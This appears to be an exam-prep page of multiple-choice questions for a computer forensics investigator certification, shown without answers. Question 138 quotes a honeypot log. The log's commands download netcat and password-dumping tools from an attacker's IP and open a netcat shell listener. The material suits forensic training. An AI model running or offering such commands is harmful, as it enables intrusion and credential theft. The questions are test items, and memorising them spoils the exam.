
Computer Hacking Forensic Investigator (v9)

Last Update: 12 hours ago. Total Questions: 589

The Computer Hacking Forensic Investigator (v9) content is now fully updated, with all current exam questions added 12 hours ago. Deciding to include 312-49v9 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our 312-49v9 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these 312-49v9 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any Computer Hacking Forensic Investigator (v9) practice test comfortably within the allotted time.

Question # 136

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?

A. Globally unique ID

B. Microsoft Virtual Machine Identifier

C. Personal Application Protocol

D. Individual ASCII string

Question # 137

When reviewing web logs, you see an entry for resource not found in the HTTP status code field.

What is the actual error code that you would see in the log for resource not found?

A. 202

B. 404

C. 505

D. 909

Question # 138

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 > ftpcom"

"cmd1.exe /c echo johna2k >> ftpcom"

"cmd1.exe /c echo haxedj00 >> ftpcom"

"cmd1.exe /c echo get nc.exe >> ftpcom"

"cmd1.exe /c echo get pdump.exe >> ftpcom"

"cmd1.exe /c echo get samdump.dll >> ftpcom"

"cmd1.exe /c echo quit >> ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A. It is a local exploit where the attacker logs in using username johna2k

B. There are two attackers on the system - johna2k and haxedj00

C. The attack is a remote exploit and the hacker downloads three files

D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Question # 139

What does mactime, an essential part of the Coroner's Toolkit, do?

A. It traverses the file system and produces a listing of all files based on the modification, access and change timestamps

B. It can recover deleted file space and search it for data. However, it does not allow the investigator to preview them

C. The tool scans for i-node information, which is used by other tools in the tool kit

D. It is too specific to the MAC OS and forms a core component of the toolkit

Question # 140

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A. Passive IDS

B. Active IDS

C. Progressive IDS

D. NIPS

Question # 141

You are called in to assist the police in an investigation involving a suspected drug dealer. The suspect's house was searched by the police after a warrant was obtained and they located a floppy disk in the suspect's bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?

A. Limited force and library attack

B. Brute Force and dictionary Attack

C. Maximum force and thesaurus Attack

D. Minimum force and appendix Attack

Question # 142

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.

The second utility executes five known exploits against his network that the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?

A. False negatives

B. False positives

C. True negatives

D. True positives

Question # 143

An employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the employee's computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that the employee was in possession of the proprietary information?

A. EFS uses a 128-bit key that can't be cracked, so you will not be able to recover the information

B. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.

C. The EFS Revoked Key Agent can be used on the Computer to recover the information

D. When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.

Question # 144

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A. Smurf

B. Trinoo

C. Fraggle

D. SYN flood

Question # 145

Jacob is a computer forensics investigator with over 10 years of experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify to the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob's testimony in this case?

A. Certification

B. Justification

C. Reiteration

D. Authentication

Question # 146

Smith is an IT technician who has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should take to create the network vulnerability assessment plan?

A. Their first step is to make a hypothesis of what their final findings will be.

B. Their first step is to create an initial Executive report to show the management team.

C. Their first step is to analyze the data they have currently gathered from the company or interviews.

D. Their first step is the acquisition of required documents, reviewing of security policies and compliance.

Question # 147

Sheila is a forensics trainee and is searching for hidden image files on a hard disk. She used a forensic investigation tool to view the media in hexadecimal code for simplifying the search process. Which of the following hex codes should she look for to identify image files?

A. ff d8 ff

B. 25 50 44 46

C. d0 0f 11 e0

D. 50 41 03 04

Question # 148

Which list contains the most recent actions performed by a Windows User?

A. MRU

B. Activity

C. Recents

D. Windows Error Log

Question # 149

Raw data acquisition format creates _________ of a data set or suspect drive.

A. Segmented image files

B. Simple sequential flat files

C. Compressed image files

D. Segmented files

Question # 150

MAC filtering is a security access control methodology, where a ___________ is assigned to each network card to determine access to the network.

A. 48-bit address

B. 24-bit address

C. 16-bit address

D. 32-bit address
